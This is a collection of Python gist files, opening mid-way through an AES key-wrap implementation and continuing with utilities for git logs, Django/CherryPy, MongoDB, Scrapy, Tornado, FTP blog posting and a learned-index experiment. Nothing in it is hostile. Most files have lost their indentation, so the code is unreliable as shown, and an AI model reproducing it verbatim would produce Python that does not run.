R = [None]+[wrapped[i*8:i*8+8] for i in range(1, n+1)]
A = QUAD.unpack(wrapped[:8])[0]
decrypt = AES.new(kek).decrypt
for j in range(5,-1,-1): #counting down
for i in range(n, 0, -1): #(n, n-1, ..., 1)
ciphertext = QUAD.pack(A^(n*j+i)) + R[i]
B = decrypt(ciphertext)
A = QUAD.unpack(B[:8])[0]
R[i] = B[8:]
return "".join(R[1:]), A
#key wrapping as defined in RFC 3394
#http://www.ietf.org/rfc/rfc3394.txt
def aes_unwrap_key(kek, wrapped, iv=0xa6a6a6a6a6a6a6a6):
key, key_iv = aes_unwrap_key_and_iv(kek, wrapped)
if key_iv != iv:
raise ValueError("Integrity Check Failed: "+hex(key_iv)+" (expected "+hex(iv)+")")
return key
#alternate initial value for aes key wrapping, as defined in RFC 5649 section 3
#http://www.ietf.org/rfc/rfc5649.txt
def aes_unwrap_key_withpad(kek, wrapped):
if len(wrapped) == 16:
plaintext = AES.new(kek).decrypt(wrapped)
key, key_iv = plaintext[:8], plaintext[8:]
else:
key, key_iv = aes_unwrap_key_and_iv(kek, wrapped)
key_iv = "{0:016X}".format(key_iv)
if key_iv[:8] != "A65959A6":
raise ValueError("Integrity Check Failed: "+key_iv[:8]+" (expected A65959A6)")
key_len = int(key_iv[8:], 16)
return key[:key_len]
def aes_wrap_key(kek, plaintext, iv=0xa6a6a6a6a6a6a6a6):
n = len(plaintext)/8
R = [None]+[plaintext[i*8:i*8+8] for i in range(0, n)]
A = iv
encrypt = AES.new(kek).encrypt
for j in range(6):
for i in range(1, n+1):
B = encrypt(QUAD.pack(A) + R[i])
A = QUAD.unpack(B[:8])[0] ^ (n*j + i)
R[i] = B[8:]
return QUAD.pack(A) + "".join(R[1:])
def aes_wrap_key_withpad(kek, plaintext):
iv = 0xA65959A600000000 + len(plaintext)
plaintext = plaintext + "\0" * ((8 - len(plaintext)) % 8)
if len(plaintext) == 8:
        return AES.new(kek).encrypt(QUAD.pack(iv) + plaintext)
return aes_wrap_key(kek, plaintext, iv)
def test():
#test vector from RFC 3394
import binascii
KEK = binascii.unhexlify("000102030405060708090A0B0C0D0E0F")
CIPHER = binascii.unhexlify("1FA68B0A8112B447AEF34BD8FB5A7B829D3E862371D2CFE5")
PLAIN = binascii.unhexlify("00112233445566778899AABBCCDDEEFF")
assert aes_unwrap_key(KEK, CIPHER) == PLAIN
assert aes_wrap_key(KEK, PLAIN) == CIPHER
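# --- Hedged round-trip sketch for the RFC 5649 with-pad variant (added; not in the gist) ---
def test_withpad():
    # Re-uses the RFC 3394 test KEK; a 20-byte key exercises the padded code path.
    import binascii
    kek = binascii.unhexlify("000102030405060708090A0B0C0D0E0F")
    key = "\x01" * 20
    assert aes_unwrap_key_withpad(kek, aes_wrap_key_withpad(kek, key)) == key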
```
#### File: hard-gists/42472327b4be382b02eb/snippet.py
```python
from pygit2 import Repository
from pygit2 import GIT_SORT_TOPOLOGICAL, GIT_SORT_REVERSE
import datetime
import json
import sys
class TzOffset(datetime.tzinfo):
def __init__(self, offset=19800, name=None):
self.offset = datetime.timedelta(seconds=offset)
self.name = name or self.__class__.__name__
def utcoffset(self, dt):
return self.offset
def tzname(self, dt):
return self.name
def dst(self, dt):
return datetime.timedelta(0)
def fmtdate(obj):
tz = TzOffset(offset=obj.offset*60, name=None)
date = datetime.datetime.fromtimestamp(obj.time, tz)
return date.strftime('%Y-%m-%d %H:%M:%S%z')
repo = Repository('.git')
commits = []
for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL):
obj = {
"commit": commit.hex,
"abbreviated_commit": commit.hex[0:10],
"tree": commit.tree.hex,
"abbreviated_tree": commit.tree.hex[0:10],
"parents": [x.hex for x in commit.parents],
"abbreviated_parents": [x.hex[0:10] for x in commit.parents],
"encoding": commit.message_encoding or '',
"subject": commit.message.split('\n')[0],
"body": commit.message,
"author": {
"name": commit.author.name,
"email": commit.author.email,
"date": fmtdate(commit.author)
},
"commiter": {
"name": commit.committer.name,
"email": commit.committer.email,
"date": fmtdate(commit.committer)
}
}
commits.append(obj)
json.dump(commits, sys.stdout, indent=4, sort_keys=True)
```
#### File: hard-gists/4349257/snippet.py
```python
import os
import webbrowser
from threading import Timer
os.environ["DJANGO_SETTINGS_MODULE"] = "webapp.settings"
import cherrypy
from django.conf import settings
from django.core.handlers.wsgi import WSGIHandler
class DjangoApplication(object):
HOST = "127.0.0.1"
PORT = 8001
def mount_static(self, url, root):
"""
:param url: Relative url
:param root: Path to static files root
"""
config = {
'tools.staticdir.on': True,
'tools.staticdir.dir': root,
'tools.expires.on': True,
'tools.expires.secs': 86400
}
cherrypy.tree.mount(None, url, {'/': config})
def open_browser(self):
Timer(3, webbrowser.open, ("http://%s:%s" % (self.HOST, self.PORT),)).start()
def run(self):
cherrypy.config.update({
'server.socket_host': self.HOST,
'server.socket_port': self.PORT,
'engine.autoreload_on': False,
'log.screen': True
})
self.mount_static(settings.STATIC_URL, settings.STATIC_ROOT)
cherrypy.log("Loading and serving Django application")
cherrypy.tree.graft(WSGIHandler())
cherrypy.engine.start()
self.open_browser()
cherrypy.engine.block()
if __name__ == "__main__":
print "Your app is running at http://localhost:8001"
DjangoApplication().run()
```
#### File: hard-gists/4350345/snippet.py
```python
from pymongo import Connection
from bson import ObjectId
from itertools import imap
class Model(dict):
"""
A simple model that wraps mongodb document
"""
__getattr__ = dict.get
__delattr__ = dict.__delitem__
__setattr__ = dict.__setitem__
def save(self):
if not self._id:
self.collection.insert(self)
else:
self.collection.update(
{ "_id": ObjectId(self._id) }, self)
def reload(self):
if self._id:
self.update(self.collection\
.find_one({"_id": ObjectId(self._id)}))
def remove(self):
if self._id:
self.collection.remove({"_id": ObjectId(self._id)})
self.clear()
# ------------------------------
# Here is the example model
# ------------------------------
class Document(Model):
collection = Connection()["test_database"]["test_collections"]
@property
def keywords(self):
return self.title.split()
# ------------------------------
# Mapping documents to the model
# ------------------------------
documents = imap(Document, Document.collection.find())
# that's all
for document in documents:
print document.title, document.keywords
# ------------------------------
# Creating new document
# ------------------------------
document = Document({
"title": "test document",
"slug": "test-document"
})
print document._id # none
document.save()
print document._id # "50d3cb0068c0064a21e76be4"
# -------------------------
# Getting a single document
# -------------------------
document = Document({
"_id": "50d3cb0068c0064a21e76be4"
})
print document.title # None
document.reload()
print document.title # "test document"
# -----------------
# Updating document
# -----------------
document.title = "test document 2"
document.save()
print document.title # "test document 2"
document.reload()
print document.title # "test document 2"
# -----------------
# Removing document
# -----------------
document.remove()
print document # {}
```
#### File: hard-gists/4427984/snippet.py
```python
from optparse import OptionParser
import logging
import logging.handlers
import os
import sys
import urllib2
if __name__ != '__main__':
import dns.resolver
def get_logger(logdir, debug):
"""docstring for get_logger"""
logname = 'dontpanic.log'
logdir = logdir or '.'
debug = debug or False
logger = logging.getLogger()
#formatter = logging.Formatter(
#'%(asctime)s - %(levelname)s - %(message)s')
if debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logfile_handler = logging.handlers.RotatingFileHandler(
os.path.join(logdir, logname)
)
stream_handler = logging.StreamHandler()
#logfile.setFormatter(formatter)
logger.addHandler(logfile_handler)
logger.addHandler(stream_handler)
logger.debug("Logger initialized ... ")
return logger
class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_301(
self, req, fp, code, msg, headers)
result.status = code
return result
def http_error_302(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_302(
self, req, fp, code, msg, headers)
result.status = code
return result
class DefaultErrorHandler(urllib2.HTTPDefaultErrorHandler):
def http_error_default(self, req, fp, code, msg, headers):
result = urllib2.HTTPError(
req.get_full_url(), code, msg, headers, fp)
result.status = code
return result
class Parser(object):
def parse_nginx_conf(self, nginx_file):
"""
"""
domains = []
logger.debug("Starting parsing nginx conf file: %s", nginx_file)
with open(nginx_file) as conf:
for line in conf:
if "server_name " in line and "#" not in line:
line_domains = line.strip().replace("server_name ", "")
line_domains = line_domains.replace(";", "").split()
domains.extend(line_domains)
logger.debug("Added %s domains from nginx conf file: %s", domains, nginx_file)
logger.debug("Parsing nginx conf: %s completed\n", nginx_file)
return domains
def parse_apache_conf(self, apache_file):
"""
"""
domains = []
logger.debug("Starting parsing apache conf file: %s", apache_file)
with open(apache_file) as conf:
for line in conf:
if "ServerAlias" in line and "#" not in line:
line_domains = line.strip().replace("ServerAlias", "").split()
domains.extend(line_domains)
logger.debug("Added %s domains from apache conf file: %s", domains, apache_file)
logger.debug("Parsing apache conf completed\n")
return domains
def _file_list(self, directory):
"""
"""
for dirname, dirnames, filenames in os.walk(directory):
for filename in filenames:
yield os.path.join(dirname, filename)
def parse_nginx_dir(self, nginx_dir):
"""docstring for parse_nginx_dir"""
domains = []
for conf in self._file_list(nginx_dir):
domains += self.parse_nginx_conf(conf)
return domains
def parse_apache_dir(self, apache_dir):
"""docstring for parse_apache_dir"""
domains = []
for conf in self._file_list(apache_dir):
domains += self.parse_apache_conf(conf)
return domains
class DomainChecker(object):
def __init__(self, timeout=3, agent="dontpanic/1.0"):
self.timeout = timeout
self.agent = agent
self.opener = urllib2.build_opener()
def _build_request(self, url):
        self.url = url
        if not self.url.startswith("http"):
            self.hurl = "http://" + url
        else:
            self.hurl = url
        request = urllib2.Request(self.hurl)
request.add_header('User-Agent', self.agent)
request.add_header('Accept-encoding', 'gzip')
return request
def get_code(self, url):
response = self.opener.open(self._build_request(url))
if hasattr(response, 'status'):
return response.status
else:
return response.code
def check_domain(self, domain, our_ip_list=None):
oklist, foolist = [], []
code = None
our_shit = False
# XXX
if our_ip_list is None:
our_shit = True
else:
try:
answers = dns.resolver.query(domain, 'A')
for answer in answers:
if answer.address in our_ip_list:
our_shit = True
except:
pass
try:
code = self.get_code(domain)
except urllib2.HTTPError, e:
if our_shit:
logger.info("%s retuned %s -- BAD", domain, e.code)
else:
logger.info("%s retuned %s -- BAD (Not our problem hosted at %s)", domain, e.code, answer.address)
code = e.code
except urllib2.URLError, e:
logger.info("%s %s -- SUPER BAD (domain not registered or no DNS record)", domain, e.reason)
if code in (200, 301, 302):
if our_shit:
logger.info("%s retuned %s -- OK", domain, code)
else:
logger.info("%s retuned %s -- OK (Not our problem hosted at %s)", domain, code, answer.address)
oklist.append(domain)
else:
foolist.append(domain)
return foolist
if __name__ == "__main__":
parser = OptionParser()
parser.usage = "%prog [options]" + __doc__
parser.add_option("-n", "--nginx-conf-dir", dest="nginx_dir",
help="directory with nginx conf files", metavar="NDIR")
parser.add_option("-a", "--apache-conf-dir", dest="apache_dir",
help="directory with apache conf files", metavar="ADIR")
parser.add_option("-l", "--log-dir", dest="logdir",
help="write report to LOGDIR", metavar="LOGDIR")
parser.add_option("-d", "--debug",
dest="debug", default=False,
help="debug mode")
parser.add_option("-i", "--ips",
dest="ips", default=None,
help="ip or ips of our server (will activate dns resolver)")
args = parser.parse_args()[0]
logger = get_logger(args.logdir, args.debug)
logger.info('Starting ...')
p = Parser()
dc = DomainChecker()
nginx_domains, apache_domains = [], []
if getattr(args, 'nginx_dir') is not None:
nginx_domains = p.parse_nginx_dir(args.nginx_dir)
if getattr(args, 'apache_dir') is not None:
apache_domains = p.parse_apache_dir(args.apache_dir)
domains = nginx_domains + apache_domains
if args.ips:
try:
import dns.resolver
except ImportError:
            print 'You need to install the dnspython package (python-dnspython).'
if not domains:
print 'No domains found !'
logger.info('No domains found !')
sys.exit(0)
logger.info("Start checking the domains ...")
for domain in domains:
dc.check_domain(domain, args.ips)
logger.info("Ending ...\n\n\n")
```
#### File: hard-gists/4451253/snippet.py
```python
from scrapy.spider import BaseSpider
class MindhacksSpider(BaseSpider):
domain_name = "mindhacks.cn"
start_urls = ["http://mindhacks.cn/"]
def parse(self, response):
return []
SPIDER = MindhacksSpider()
#######################################################
from scrapy.selector import HtmlXPathSelector
from scrapy.spider import BaseSpider
from scrapy.http import Request
from myproject.items import MyItem
class MySpider(BaseSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = [
'http://www.example.com/1.html',
'http://www.example.com/2.html',
'http://www.example.com/3.html',
]
def parse(self, response):
hxs = HtmlXPathSelector(response)
for h3 in hxs.select('//h3').extract():
yield MyItem(title=h3)
for url in hxs.select('//a/@href').extract():
yield Request(url, callback=self.parse)
############################################################
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from scrapy.item import Item
class MySpider(CrawlSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = ['http://www.example.com']
rules = (
# Extract links matching 'category.php' (but not matching 'subsection.php')
# and follow links from them (since no callback means follow=True by default).
Rule(SgmlLinkExtractor(allow=('category\.php', ), deny=('subsection\.php', ))),
# Extract links matching 'item.php' and parse them with the spider's method parse_item
Rule(SgmlLinkExtractor(allow=('item\.php', )), callback='parse_item'),
)
def parse_item(self, response):
self.log('Hi, this is an item page! %s' % response.url)
hxs = HtmlXPathSelector(response)
item = Item()
item['id'] = hxs.select('//td[@id="item_id"]/text()').re(r'ID: (\d+)')
item['name'] = hxs.select('//td[@id="item_name"]/text()').extract()
item['description'] = hxs.select('//td[@id="item_description"]/text()').extract()
return item
################################################################################################
from scrapy import log
from scrapy.contrib.spiders import XMLFeedSpider
from myproject.items import TestItem
class MySpider(XMLFeedSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = ['http://www.example.com/feed.xml']
    iterator = 'iternodes' # This is actually unnecessary, since it's the default value
itertag = 'item'
def parse_node(self, response, node):
log.msg('Hi, this is a <%s> node!: %s' % (self.itertag, ''.join(node.extract())))
        item = TestItem()
item['id'] = node.select('@id').extract()
item['name'] = node.select('name').extract()
item['description'] = node.select('description').extract()
return item
#########################################################################
from scrapy import log
from scrapy.contrib.spiders import CSVFeedSpider
from myproject.items import TestItem
class MySpider(CSVFeedSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = ['http://www.example.com/feed.csv']
delimiter = ';'
headers = ['id', 'name', 'description']
def parse_row(self, response, row):
log.msg('Hi, this is a row!: %r' % row)
item = TestItem()
item['id'] = row['id']
item['name'] = row['name']
item['description'] = row['description']
return item
##########################################################################
def parse(self, response):
items = []
hxs = HtmlXPathSelector(response)
posts = hxs.x('//h1/a/@href').extract()
items.extend([self.make_requests_from_url(url).replace(callback=self.parse_post)
for url in posts])
page_links = hxs.x('//div[@class="wp-pagenavi"]/a[not(@title)]')
for link in page_links:
if link.x('text()').extract()[0] == u'\xbb':
url = link.x('@href').extract()[0]
items.append(self.make_requests_from_url(url))
return items
################################################################################
def parse_post(self, response):
item = BlogCrawlItem()
item.url = unicode(response.url)
item.raw = response.body_as_unicode()
return [item]
################################################################################
class BlogCrawlItem(ScrapedItem):
def __init__(self):
ScrapedItem.__init__(self)
self.url = ''
def __str__(self):
return 'BlogCrawlItem(url: %s)' % self.url
################################################################################
```
#### File: hard-gists/446bcbe699d4fb54972f/snippet.py
```python
import argparse
import json
from pyOSC import OSC
from SimpleWebSocketServer import WebSocket, SimpleWebSocketServer
# arguments
parser = argparse.ArgumentParser(description='Websocket to OSC bridge')
parser.add_argument('websocket',
type=int,
nargs='?',
default=7776,
help='The port for WebSocket')
parser.add_argument('osc',
type=int,
nargs='?',
default=7777,
help='The port for OSC')
class OscBridge(WebSocket):
''' Websocket to OSC bridge '''
def __init__(self, server, sock, address):
super(OscBridge, self).__init__(server, sock, address)
args = parser.parse_args()
self.oscClient = OSC.OSCClient()
self.oscClient.connect(('127.0.0.1', args.osc))
def parseMsg(self, address, msg):
messages = []
if isinstance(msg, dict):
[messages.extend(self.parseMsg(address + '/' + k, v))
for k, v in msg.items()]
elif isinstance(msg, list):
if isinstance(msg[0], dict) or isinstance(msg[0], list):
[messages.extend(self.parseMsg(address, m)) for m in msg]
else:
messages.append(self.createOsc(address, msg))
else:
messages.append(self.createOsc(address, [msg]))
return messages
def createOsc(self, address, params):
msg = OSC.OSCMessage(address)
[msg.append(param) for param in params]
return msg
def handleMessage(self):
msg = json.loads(self.data)
oscMsgs = []
[oscMsgs.extend(self.parseMsg('/' + address, msg))
for address, msg in msg.items()]
bundle = OSC.OSCBundle()
[bundle.append(osc) for osc in oscMsgs]
self.oscClient.send(bundle)
print(oscMsgs)
def handleConnected(self):
print self.address, 'connected'
def handleClose(self):
print self.address, 'closed'
if __name__ == '__main__':
args = parser.parse_args()
server = SimpleWebSocketServer('', args.websocket, OscBridge)
server.serveforever()
```
#### File: hard-gists/4471462/snippet.py
```python
from __future__ import print_function
from collections import defaultdict
import sys
import DNS
import re
RE_PARSE = re.compile(r'(ip4|ip6|include|redirect)[:=](.*)', re.IGNORECASE)
MAX_RECURSION = 5
def dns_txt(domain):
try:
resp = DNS.dnslookup(domain, 'TXT')
except DNS.ServerError as err:
print(err, file=sys.stderr)
return None
response = []
for r in resp:
response.append(''.join(r))
return response
def dns_parse(txt_field):
resp = defaultdict(set)
for rec in txt_field:
fields = rec.split()
for field in fields:
match = RE_PARSE.match(field)
if match:
resp[match.group(1)].add(match.group(2))
return resp
def process(domain):
domains = [domain]
ip_addresses = set()
for cnt in range(MAX_RECURSION):
includes = set()
for dom in domains:
txt = dns_txt(dom)
if not txt:
continue
spf = dns_parse(txt)
ip_addresses |= spf.get('ip4', set())
ip_addresses |= spf.get('ip6', set())
includes |= spf.get('include', set())
includes |= spf.get('redirect', set())
if not includes:
break
domains = includes
return ip_addresses
if __name__ == '__main__':
whitelist = set()
with open(sys.argv[1]) as fd:
for line in fd:
line = line.strip()
for ip in process(line):
whitelist.add(ip)
for ip in sorted(whitelist):
print(ip)
```
#### File: hard-gists/4524784/snippet.py
```python
import inspect
from django.conf import settings
from django.utils.importlib import import_module
from django.core.exceptions import ImproperlyConfigured
class AlreadyRegistered(Exception):
pass
class NotRegistered(Exception):
pass
class Registry(object):
"Simple class that keeps track of a set of registered classes."
def __init__(self, default=None, register_instance=True):
if register_instance and inspect.isclass(default):
default = default()
self.register_instance = register_instance
self.default = default
self._registry = {}
if default:
self.register(default)
def __getitem__(self, name):
return self._registry.get(name, self.default)
def get(self, name):
return self.__getitem__(name)
def register(self, obj, name=None):
"""Registers a class with an optional name. The class name will be used
if not supplied.
"""
if inspect.isclass(obj):
name = name or obj.__name__
# Create an instance if instances should be registered
if self.register_instance:
obj = obj()
else:
name = name or obj.__class__.__name__
if name in self._registry:
raise AlreadyRegistered('The class {0} is already registered'.format(name))
# Check to see if this class should be used as the default for this
# registry
if getattr(obj, 'default', False):
            # ensure that an already-overridden default is not being
            # overridden again.
if self.default:
if self.register_instance:
name = self.default.__class__.__name__
else:
name = self.default.__name__
objtype = 'class' if self.register_instance else 'instance'
raise ImproperlyConfigured('The default {0} cannot be set '
'more than once for this registry ({1} is the default).'.format(objtype, name))
self.default = obj
else:
if name in self._registry:
raise AlreadyRegistered('Another class is registered with the '
'name "{0}"'.format(name))
self._registry[name] = obj
def unregister(self, name):
"""Unregisters a class. Note that these calls must be made in
INSTALLED_APPS listed after the apps that already registered the class.
"""
# Use the name of the class if passed in. Second condition checks for an
# instance of the class.
if inspect.isclass(name):
name = name.__name__
elif hasattr(name, '__class__'):
name = name.__class__.__name__
if name not in self._registry:
objtype = 'class' if self.register_instance else 'instance'
raise NotRegistered('No {0} is registered under the name "{1}"'.format(objtype, name))
self._registry.pop(name)
@property
def choices(self):
"Returns a 2-tuple list of all registered class instance names."
return sorted((x, x) for x in self._registry.iterkeys())
def autodiscover(module_name):
"""Simple auto-discover for looking through each INSTALLED_APPS for each
``module_name`` and fail silently when not found. This should be used for
modules that have 'registration' like behavior.
"""
for app in settings.INSTALLED_APPS:
# Attempt to import the app's ``module_name``.
try:
import_module('{0}.{1}'.format(app, module_name))
except:
pass
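# --- Hedged usage sketch (added; ExampleBackend is a hypothetical class) ---
# With register_instance=True (the default) the registry stores instances and
# falls back to `default` when a name is not registered.
class ExampleBackend(object):
    pass

example_registry = Registry(default=ExampleBackend)
example_registry.register(ExampleBackend, name='alias')  # second registration under an explicit name
fallback = example_registry['missing']                    # -> the default ExampleBackend instance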
```
#### File: hard-gists/4555911/snippet.py
```python
import Image, ImageOps, ImageFilter
import ftplib
from string import Template
import datetime
from io import BytesIO
import cStringIO
import urllib
from unicodedata import normalize
import sys
import keychain
import console
import clipboard
console.clear()
# FTP credentials. Self explanatory. uses keychain
# to store FTP password
userName = "username"
userPass = keychain.get_password("ftp",userName)
host = "mysite.com"
rootDir = "/public_html/"
# These are specific fields that I want to add to my YAML info
# at the top of my article. You may not have a need for these
# so simply remove them from the code and be sure to clean
# up the 'template' variable below as well as the 'values'
# template way below.
post_template_name = "blog"
author = "admin"
# This is my post template. You can change it to whatever you need
# yours to look like. However, the values are populated down further
# in the script and you will need to ensure that your '$y' variables
# match up, otherwise the script will fail in a not so graceful manner. Also, I have a strange way of creating header images for posts.
# It's not common to have that 'photos' list at the bottom of the template;
# you may want to move '$yPhotos' below the dashed lines into your content
template ='''---
title: $yTitle
_templates: $yTemplate
author: $yAuthor
categories:
- $yCategories
status: $yStatus
photos:
- url: $yPhotos
---
$yContent'''
# standard locations for images and content for Statamic
imgBase = "/assets/img/"
contentBase = "/_content/"
imgRemotePath = rootDir + imgBase
txtRemotePath = rootDir + contentBase
# Let's get the image from the clipboard and ask some questions
today = datetime.datetime.now()
image = clipboard.get_image()
imgFileName = console.input_alert("Image Title", "Enter Image File Name")
title = console.input_alert("Article Title", "Enter the article title")
sts = console.alert("Status","Choose the article status","Live","Draft","Hidden")
category = console.input_alert("Post category", "Enter a category")
words = console.input_alert("Article Text", "Enter your thoughts")
imgFileName = imgFileName +'_'+ today.strftime("%Y-%m-%d-%H%M%S") +'.png'
if sts == 1:
status = "live"
elif sts == 2:
status = "draft"
elif sts == 3:
status = "hidden"
# Can we connect to the FTP?
try:
console.show_activity()
ftp = ftplib.FTP(host, userName, userPass)
console.hide_activity()
except Exception as e:
print "Unable to connect to FTP"
# trying to retrieve the folders used in the 'txtRemotePath' directory
# returns a simple dictionary with folders info separated.
def get_folders():
try:
console.show_activity()
ftp.cwd(txtRemotePath)
data = []
ftp.retrlines('MLSD', data.append)
dir = []
for line in data:
facts_found, _, name = line.rstrip('CRLF').partition(' ')
entry = {}
for fact in facts_found[:-1].split(";"):
key, _, value = fact.partition("=")
entry[key.lower()] = value
if entry['type'] == 'dir':
dir.append(name)
count = 0
folders = []
for eachDir in dir:
folder = eachDir.partition("-")[2]
folders.append([count,eachDir,folder])
count +=1
return folders
except Exception as e:
print "Unable to get folder listing"
# Generates the actual text for the article with YAML headers
def make_file(template,values):
yaml_fe = Template(template)
result = yaml_fe.safe_substitute(values)
return result
# Found this at https://gist.github.com/4021956
# this will help when we need to slugify your title for the filename
def slug(text, encoding=None, permitted_chars='abcdefghijklmnopqrstuvwxyz0123456789-'):
if isinstance(text, str):
text = text.decode(encoding or 'ascii')
clean_text = text.strip().replace(' ', '-').lower()
while '--' in clean_text:
clean_text = clean_text.replace('--','-')
ascii_text = normalize('NFKD', clean_text).encode('ascii', 'ignore')
strict_text = map(lambda x: x if x in permitted_chars else '', ascii_text)
return ''.join(strict_text)
# David's code to resize your clipboard image
def customSize(img):
w, h = img.size
print 'w: ' + str(w)
print 'h: '+ str(h)
if w > 600:
wsize = 600/float(w)
print 'wsize: '+str(wsize)
hsize = int(float(h)*float(wsize))
print 'hsize: ' + str(hsize)
img = img.resize((600, hsize), Image.ANTIALIAS)
return img
# Nothing to see here. Just the fun stuff coming together.
image = customSize(image)
print image.size
image.show()
print title + " (" + status + ")"
print words
imgBuffer = BytesIO()
image.save(imgBuffer, 'png')
imgBuffer.seek(0)
folders = get_folders()
# I decided to stop at 3 folders in the assets directory. I only have 2
# and more than 3 seemed like the exception not the rule so I got lazy.
if len(folders) == 1:
folder_slug = 1
elif len(folders) == 2:
folder_slug = console.alert("Category","Choose image folder",folders[0][2].title(),folders[1][2].title())
elif len(folders) == 3:
folder_slug = console.alert("Category","Choose image folder",folders[0][2].title(),folders[1][2].title(),folders[2][2].title())
imgRemoteFilePath = imgRemotePath + folders[folder_slug-1][2] + "/"
txtRemoteFilePath = txtRemotePath + folders[folder_slug-1][1] + "/"
# My site uses the _entry_timestamps variable
# set to true so you may need to modify the
# date format below
title_slug = slug(title)
txtFileName = today.strftime("%Y-%m-%d-%H%M") +'_'+ title_slug +'.md'
fileURL = urllib.quote(imgFileName)
imageLink = imgRemoteFilePath+fileURL
imgMarkdownFilePath = imgBase + folders[folder_slug-1][2] + "/" + fileURL
# Told you it was way down here. These '$y' keys and their corresponding
# values need to match whatever you have listed at the top in the
# 'template' variable
values = {
"yTitle" : title,
"yTemplate" : post_template_name,
"yAuthor" : author,
"yCategories" : category,
"yStatus" : status,
"yPhotos" : imgMarkdownFilePath,
"yContent" : words
}
txtData = make_file(template,values)
txtBuffer = cStringIO.StringIO()
txtBuffer.write(txtData)
txtBuffer.seek(0)
# Doing some uploading here.
try:
console.show_activity()
ftp.cwd(imgRemoteFilePath)
ftp.storbinary('STOR '+imgFileName, imgBuffer)
console.hide_activity()
except Exception as e:
print "Unable save image file"
try:
console.show_activity()
ftp.cwd(txtRemoteFilePath)
ftp.storbinary('STOR '+txtFileName, txtBuffer)
console.hide_activity()
except Exception as e:
print "Unable save article file"
ftp.quit()
print "\n=================\nFinished"
```
#### File: hard-gists/4587049/snippet.py
```python
from pandas import np
from pandas.io.data import DataReader
def historical_volatility(sym, days):
"Return the annualized stddev of daily log returns of `sym`."
try:
quotes = DataReader(sym, 'yahoo')['Close'][-days:]
except Exception, e:
print "Error getting data for symbol '{}'.\n".format(sym), e
return None, None
logreturns = np.log(quotes / quotes.shift(1))
return np.sqrt(252*logreturns.var())
if __name__ == "__main__":
print historical_volatility('GOOG', 30)
```
#### File: hard-gists/4594879/snippet.py
```python
from concurrent.futures import ThreadPoolExecutor
from functools import partial, wraps
import time
import tornado.ioloop
import tornado.web
EXECUTOR = ThreadPoolExecutor(max_workers=4)
def unblock(f):
@tornado.web.asynchronous
@wraps(f)
def wrapper(*args, **kwargs):
self = args[0]
def callback(future):
self.write(future.result())
self.finish()
EXECUTOR.submit(
partial(f, *args, **kwargs)
).add_done_callback(
lambda future: tornado.ioloop.IOLoop.instance().add_callback(
partial(callback, future)))
return wrapper
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello, world %s" % time.time())
class SleepHandler(tornado.web.RequestHandler):
@unblock
def get(self, n):
time.sleep(float(n))
return "Awake! %s" % time.time()
class SleepAsyncHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self, n):
def callback(future):
self.write(future.result())
self.finish()
EXECUTOR.submit(
partial(self.get_, n)
).add_done_callback(
lambda future: tornado.ioloop.IOLoop.instance().add_callback(
partial(callback, future)))
def get_(self, n):
time.sleep(float(n))
return "Awake! %s" % time.time()
application = tornado.web.Application([
(r"/", MainHandler),
(r"/sleep/(\d+)", SleepHandler),
(r"/sleep_async/(\d+)", SleepAsyncHandler),
])
if __name__ == "__main__":
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()
```
#### File: hard-gists/45c1c820a8fa67d8e17e3079d6aa2a65/snippet.py
```python
import click
import torch
import torch.autograd
import torch.nn.functional as F
from torch.autograd import Variable
import os
import random
import math
from bisect import bisect_left
url_to_english_words = \
'https://raw.githubusercontent.com/dwyl/english-words/master/words.txt'
def get_english_words():
if not os.path.isfile('words.txt'):
import subprocess
subprocess.call(['wget', url_to_english_words])
with open('words.txt') as f:
english_words = []
for line in f:
english_words.append(line.strip())
return english_words
def exponential_distribution(lambda_=1.0):
u = random.random()
x = - math.log(u) / lambda_
return x
def sorted_numbers(N=1000):
# TODO: more complicated list
numbers = [exponential_distribution() for _ in range(N)]
numbers = sorted(numbers)
def random_fun():
x = random.choice(numbers)
y = numbers.index(x)
return x, y
return numbers, random_fun
def sorted_hash_map(N=1000):
# ignore the map for now, just get random hashes
english_words = get_english_words()
english_words = english_words[:N]
hashes = [hash(word) for word in english_words]
hashes = sorted(hashes) # pseudo hash map
def random_fun():
index = random.randint(0, N - 1)
word = english_words[index]
hash_ = hashes[index]
return word, index
return hashes, random_fun
def get_model(dim=128):
model = torch.nn.Sequential(
torch.nn.Linear(1, dim),
torch.nn.ReLU(),
torch.nn.Linear(dim, 1),
)
return model
def _featurize(x):
return torch.unsqueeze(Variable(torch.Tensor(x)), 1)
def naive_index_search(x, numbers):
for idx, n in enumerate(numbers):
if n > x:
break
return idx - 1
def bisect_search(x, numbers):
i = bisect_left(numbers, x)
if i:
return i - 1
raise ValueError
@click.command()
@click.argument('mode', type=click.Choice(['ranged', 'hash', 'bloom']))
@click.option('--n', default=1000, type=int,
help='Size of sorted array.')
@click.option('--lr', default=9e-3, type=float,
help='Learning rate of DL model (only parameter that matters!)')
def main(mode, n, lr):
"""CLI for creating machine learned index.
"""
N = n
if mode == 'ranged':
numbers, random_fun = sorted_numbers(N)
elif mode == 'hash':
raise NotImplementedError
elif mode == 'bloom':
raise NotImplementedError
model = get_model()
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
try:
while True:
batch_x = []; batch_y = []
for _ in range(32):
x, y = random_fun()
batch_x.append(x)
batch_y.append(y)
batch_x = _featurize(batch_x)
batch_y = _featurize(batch_y)
pred = model(batch_x) * N
output = F.smooth_l1_loss(pred, batch_y)
loss = output.data[0]
print(loss)
optimizer.zero_grad()
output.backward()
optimizer.step()
except KeyboardInterrupt:
pass
def _test(x):
pred = model(_featurize([x])) * N
# idx = naive_index_search(x, numbers)
idx = bisect_search(x, numbers)
print('Real:', idx, 'Predicted:', float(pred.data[0]))
_test(1.5)
import pdb
pdb.set_trace()
if __name__ == '__main__':
main()
